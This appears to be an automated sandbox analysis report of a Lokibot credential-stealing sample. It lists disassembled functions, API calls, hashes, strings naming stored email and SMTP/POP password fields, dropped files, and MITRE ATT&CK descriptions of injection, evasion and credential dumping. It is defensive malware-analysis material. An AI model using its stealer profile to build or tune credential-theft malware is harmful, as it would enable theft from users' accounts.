Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

EmailAddress, xrefs: 0040D074
PopAccount, xrefs: 0040D0B6
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
SmtpPassword, xrefs: 0040D117
PopServer, xrefs: 0040D099
Technology, xrefs: 0040D08D
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_XZoxEqlRUw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report XZoxEqlRUw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
XZoxEqlRUw.exe

Function 00401188 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 541
COMMON

Function 00434ED4 Relevance: 12.1, APIs: 8, Instructions: 95
COMMON

Function 00435017 Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Function 00434AC8 Relevance: .0, Instructions: 8
COMMON

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre